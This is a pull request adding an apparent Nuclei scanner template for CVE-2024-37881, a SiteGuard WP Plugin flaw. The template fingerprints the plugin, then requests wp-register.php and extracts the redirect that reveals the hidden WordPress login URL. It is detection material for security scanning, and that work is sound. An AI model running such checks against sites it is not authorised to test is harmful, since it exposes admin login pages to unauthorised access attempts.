### PR TITLE
add CVE-2024-37881

### DIFF
--- a/http/cves/2024/CVE-2024-37881.yaml
+++ b/http/cves/2024/CVE-2024-37881.yaml
@@ -1,0 +1,47 @@
+id: CVE-2024-37881
+
+info:
+  name: SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure
+  author: securityforeveryone
+  severity: medium
+  description: |
+    The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37881
+    - https://jvn.jp/en/jp/JVN60331535/
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/siteguard/siteguard-wp-plugin-176-login-page-disclosure
+    - https://www.usom.gov.tr/bildirim/tr-24-0726
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/siteguard/"
+  tags: cve,cve-2024,siteguard,wp-plugin
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"
+
+    matchers:
+      - type: dsl
+        internal: true
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "SiteGuard WP Plugin")'
+        condition: and
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-register.php"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "!contains(tolower(location), 'wp-login.php')"
+
+    extractors:
+      - type: kval
+        kval:
+          - location


### PR DESCRIPTION
CVE-2024-37881

When you send a request to wp-register.php, the admin panel hidden with the help of the plugin is revealed. I used flow to prevent false positives.

The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.


I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)